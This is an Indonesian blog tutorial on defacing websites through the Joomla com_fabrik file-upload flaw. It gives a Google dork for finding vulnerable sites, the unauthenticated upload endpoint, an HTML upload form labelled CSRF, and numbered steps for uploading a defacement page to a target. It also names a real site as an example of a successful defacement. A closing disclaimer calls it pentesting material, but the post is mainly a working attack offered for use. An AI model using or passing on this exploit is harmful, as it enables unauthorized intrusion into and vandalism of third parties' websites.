//]]>

Cara Deface Com Fabrik With CSRF

Monday, August 27, 2018 2 Comments

Assalamualaikum Wr.Wb
Baiklah bertemu lagi, kali ini saya akan share tutor Deface Metode Com_fabrik With CSRF.

 Bahan:
-Script Deface (Saya rasa udah punya sendiri-sendiri)
-Dork
-CSRF

 Dork:
Inurl:index.php?Option=Com_Fabrik

 -Exploit
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

 -CSRF
Bisa download Disini  

<title>CSRF Com_fabrik</title><br>

<h1><font size="10">CSRF Com_Fabrik by fadlankun</h1><br>
    <form method="POST" action="http://site.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"enctype="multipart/form-data">

    <input type="file" name="file"><button>Upload</button></form></center><br></font>

Dork: Inurl:index.php?Option=Com_Fabrik

Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Dork: Inurl:index.php?Option=Com_Fabrik 
Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
1. Dorking ke gogle atau image seperti ngedork biasa. Kembangkan sendiri dork di atas biar dapat yang fresh

2. Masukkan exploit Contoh http://site.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

 3. Jika Vuln akan ada {"filepath":null,"uri":null} Seperti ini

4. Buka csrf pastekan site target ke csrf
Contoh http://site.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

5. Buka csrf menggunakan browser. Uploadkan Script Deface kalian

6. Kalau berhasil upload akan ada {"filepath":"\/fadlankun.html","uri":"http:\/\/site.com\/script_deface.html"}
Contoh {"filepath":"\/fadlankun.html","uri":"http:\/\/www.zambianacmisonline.org\/fadlankun.html"}

7. Lihat Script deface kalian yang sudah di upload dengan cara http://site.com/script_deface.html
contoh http://www.zambianacmisonline.org/fadlankun.html

Mungkin hanya itu yang saya bisa sampaikan mengenai Tutor Deface Metode Com_fabrik

 Sekian dan Terima kasih

 Jika kalian menyukai postingan ini, Silahkan bagikan kepada teman kalian.

 Wassalamualaikum Wr.Wb
Catatan: Saya Admin tidak pernah bertanggung jawab dengan apa yang kalian perbuat,Jika ada masalah jangan pernah menyalakan website ini,Tutor ini di buat hanya untuk mengetest/pentester suatu website apakah web itu memiliki bug apa enggak.

2 Responses to "Cara Deface Com Fabrik With CSRF"

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel